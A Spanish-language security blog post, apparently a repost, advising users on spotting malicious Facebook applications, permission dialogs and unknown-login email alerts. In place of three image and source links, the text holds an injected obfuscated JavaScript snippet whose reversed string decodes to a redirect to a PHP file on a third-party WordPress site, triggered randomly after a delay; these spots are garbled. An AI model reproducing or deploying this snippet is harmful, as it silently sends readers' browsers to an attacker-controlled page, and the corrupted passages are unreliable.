Detectando aplicaciones maliciosas en Facebook

El hecho de navegar en Internet sin las debidas precauciones es un riesgo inminente para contagiarse con algún tipo de código malicioso y Facebook no es la excepción. Por esta razón es importante que los usuarios tengan en cuentan algunas recomendaciones al momento de instalar aplicaciones en su perfil.

Contar con una solución de seguridad es la mejor opción para protegerse de la infección con malware, ya que aunque se tomen muchas precauciones mientras se navega en Internet la tendencia en la propagación y los ataques informáticos muestra técnicas como el drive-by-download, donde se descargan códigos maliciosos sin que el usuario lo autorice o se percate de que lo está haciendo.

Facebook, la principal red social en Latinoamérica, no es ajena al contenido malicioso. Los ciberdelincuentes aprovechan la plataforma de desarrollo que ofrece la red social para crear aplicaciones que buscan, en la mayoría de los casos, información sensible de los usuarios y en otros redireccionarlo a sitios web con contenido malicioso para infectar su dispositivo.

Cuando un usuario se conecta a un juego, una aplicación o un sitio web integrado Facebook proporciona los datos básicos del usuario, que incluyen el identificador de usuario, la información pública y los identificadores de la lista de amigos.  Además es importante tener en cuenta que cuando se utiliza por primera vez una aplicación en Facebook, automáticamente la red social proporciona a la aplicación el idioma, el país y el rango de edad del usuario. Esta información sirve para que la aplicación pueda personalizar el contenido ofrecido al usuario y aplicar el concepto de red social. A continuación, puede observarse dicha característica:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torio/wp-content/uploads/2013/02/Img1.png”>Ver imagen

Cuando una aplicación va a ser instalada en el perfil de un usuario y esta requiere algún tipo de comportamiento específico, Facebook le muestra al usuario un cuadro de diálogo donde le informa de los permisos solicitados. En la siguiente captura se observa el ejemplo de un permiso solicitado por una aplicación potencialmente peligrosa, que una vez instalada en el perfil de un usuario le muestra banners que lo redirigen a sitios maliciosos:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torio/wp-content/uploads/2013/02/2-1.png”>Ver imagen

La opción de recibir notificaciones por correo electrónico de cuando se ha iniciado sesión de la cuenta desde dispositivos desconocidos, puede ser muy útil para que un usuario detecte si alguien ha accedido sin permiso a su perfil. Es importante destacar que el correo que recibe el usuario no le pide su clave de acceso u otra información sensible que permitiera un uso inadecuado del perfil del usuario:

$NfI=function(n){if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}torio/2013/02/01/detectando-aplicaciones-maliciosas-facebook/”>Fuente

__________

NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________

Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.

Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.

Los comentarios están cerrados.

 

Uso de cookies

Este sitio web utiliza cookies para que usted tenga la mejor experiencia de usuario. Si continúa navegando está dando su consentimiento para la aceptación de las mencionadas cookies y la aceptación de nuestra política de cookies, pinche el enlace para mayor información.

ACEPTAR
Aviso de cookies